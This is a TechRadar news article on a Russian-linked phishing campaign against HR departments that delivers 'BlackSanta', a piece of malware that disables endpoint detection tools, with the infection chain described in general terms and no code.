Russian hackers target HR departments with vicious new 'BlackSanta' malware

News
By published

The malware is described as an 'EDR killer'

Malware attack virus alert , malicious software infection , cyber security awareness training to protect business
(Image credit: Shutterstock)
  • Russian hackers target HR departments with BlackSanta malware
  • Infection chain uses phishing emails and malicious ISO files
  • BlackSanta disables EDR tools to enable deeper compromise

Russian hackers have been targeting Human Resources (HR) departments at various organizations around the world with a never-before seen piece of malware called BlackSanta.

The campaign was spotted by cybersecurity researchers Aryaka, who said the attacks have been going on for at least a year, and include a rather sophisticated infection chain.

It most likely starts with a phishing email pretending to share resumes for potential employees, including a link to a Dropbox folder holding an ISO image. These files are clones of optical discs and were rather popular in the early 2000’s until thumb drives became more affordable. These days, however, they can be seen as a major red flag since they are rarely used outside of scams.

Article continues below

EDR killer

Still, those who don’t spot the ruse, download the ISO and extract it, will get multiple files, including a shortcut file, and a PowerShell script. The script downloads a malicious DLL file and a legitimate PDF reader, which is used to side-load the DLL.

The DLL then first scans the system to see if it’s running in a sandbox environment, or a virtual machine. If it deems the machine worthy of further infection, it downloads additional payloads, among which is BlackSanta.

This piece of malware is described as an “EDR killer” - meaning it terminates endpoint detection and response tools before allowing further payloads to be deployed.

It is also capable of different things, depending on the type of EDR solution found on the target device. For example, it can suppress Windows notifications to continue running even as the OS tries to alert the user about the ongoing attack.

Aryaka says the attackers were spotted in the wild, but did not say how many organizations were attacked, or how many actually fell victim. It also did not discuss the identity of the attackers, but judging by the MO, it doesn’t seem to be any of the more popular, state-sponsored groups.

Via BleepingComputer

Best antivirus software header
The best antivirus for all budgets

➡️ Read our full guide to the best antivirus
1. Best overall:
Bitdefender Total Security
2. Best for families:
Norton 360 with LifeLock
3. Best for mobile:
McAfee Mobile Security

Follow TechRadar on Google News and add us as a preferred source to get our expert news, reviews, and opinion in your feeds. Make sure to click the Follow button!

And of course you can also follow TechRadar on TikTok for news, reviews, unboxings in video form, and get regular updates from us on WhatsApp too.

Sead Fadilpašić

Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.

You must confirm your public display name before commenting

Please logout and then login again, you will then be prompted to enter your display name.